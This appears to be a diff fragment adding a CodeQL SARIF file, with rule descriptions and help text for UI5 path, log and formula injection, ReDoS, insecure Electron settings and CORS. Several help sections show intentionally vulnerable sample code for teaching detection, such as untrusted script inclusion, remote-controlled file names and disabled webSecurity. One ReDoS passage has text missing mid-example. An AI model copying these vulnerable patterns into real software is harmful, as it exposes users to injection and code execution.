This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", + "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], + "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", + "id" : "js/ui5-path-injection", + "kind" : "path-problem", + "name" : "UI5 Path Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-log-injection", + "name" : "js/ui5-log-injection", + "shortDescription" : { + "text" : "UI5 Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", + "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. 
If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/ui5-log-injection", + "kind" : "path-problem", + "name" : "UI5 Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-formula-injection", + "name" : "js/ui5-formula-injection", + "shortDescription" : { + "text" : "UI5 Formula Injection" + }, + "fullDescription" : { + "text" : "Saving data from an uncontrolled remote source 
using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. 
For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", + "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) 
may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1236" ], + "description" 
: "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", + "id" : "js/ui5-formula-injection", + "kind" : "path-problem", + "name" : "UI5 Formula Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "codeql/javascript-queries", + "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", + "notifications" : [ { + "id" : "js/diagnostics/extraction-errors", + "name" : "js/diagnostics/extraction-errors", + "shortDescription" : { + "text" : "Extraction errors" + }, + "fullDescription" : { + "text" : "List all extraction errors for files in the source code directory." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "description" : "List all extraction errors for files in the source code directory.", + "id" : "js/diagnostics/extraction-errors", + "kind" : "diagnostic", + "name" : "Extraction errors" + } + }, { + "id" : "js/diagnostics/successfully-extracted-files", + "name" : "js/diagnostics/successfully-extracted-files", + "shortDescription" : { + "text" : "Successfully extracted files" + }, + "fullDescription" : { + "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." 
+ }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "successfully-extracted-files" ], + "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", + "id" : "js/diagnostics/successfully-extracted-files", + "kind" : "diagnostic", + "name" : "Successfully extracted files" + } + } ], + "rules" : [ { + "id" : "js/polynomial-redos", + "name" : "js/polynomial-redos", + "shortDescription" : { + "text" : "Polynomial regular expression used on uncontrolled data" + }, + "fullDescription" : { + "text" : "A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 
1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that can require polynomial time\n to match may be vulnerable to denial-of-service attacks.", + "id" : "js/polynomial-redos", + "kind" : "path-problem", + "name" : "Polynomial regular expression used on uncontrolled data", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/redos", + "name" : "js/redos", + "shortDescription" : { + "text" : "Inefficient regular expression" + }, + "fullDescription" : { + "text" : "A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. 
Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. 
The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. 
Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that requires exponential time to match certain inputs\n can be a performance bottleneck, and may be vulnerable to denial-of-service\n attacks.", + "id" : "js/redos", + "kind" : "problem", + "name" : "Inefficient regular expression", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/disabling-electron-websecurity", + "name" : "js/disabling-electron-websecurity", + "shortDescription" : { + "text" : "Disabling Electron webSecurity" + }, + "fullDescription" : { + "text" : "Disabling webSecurity can cause critical security vulnerabilities." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n", + "markdown" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. 
Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-79" ], + "description" : "Disabling webSecurity can cause critical security vulnerabilities.", + "id" : "js/disabling-electron-websecurity", + "kind" : "problem", + "name" : "Disabling Electron webSecurity", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/enabling-electron-insecure-content", + "name" : "js/enabling-electron-insecure-content", + "shortDescription" : { + "text" : "Enabling Electron allowRunningInsecureContent" + }, + "fullDescription" : { + "text" : "Enabling allowRunningInsecureContent can allow remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. 
Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n", + "markdown" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. 
Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-494" ], + "description" : "Enabling allowRunningInsecureContent can allow remote code execution.", + "id" : "js/enabling-electron-insecure-content", + "kind" : "problem", + "name" : "Enabling Electron allowRunningInsecureContent", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cors-misconfiguration-for-credentials", + "name" : "js/cors-misconfiguration-for-credentials", + "shortDescription" : { + "text" : "CORS misconfiguration for credentials transfer" + }, + "fullDescription" : { + "text" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials." 
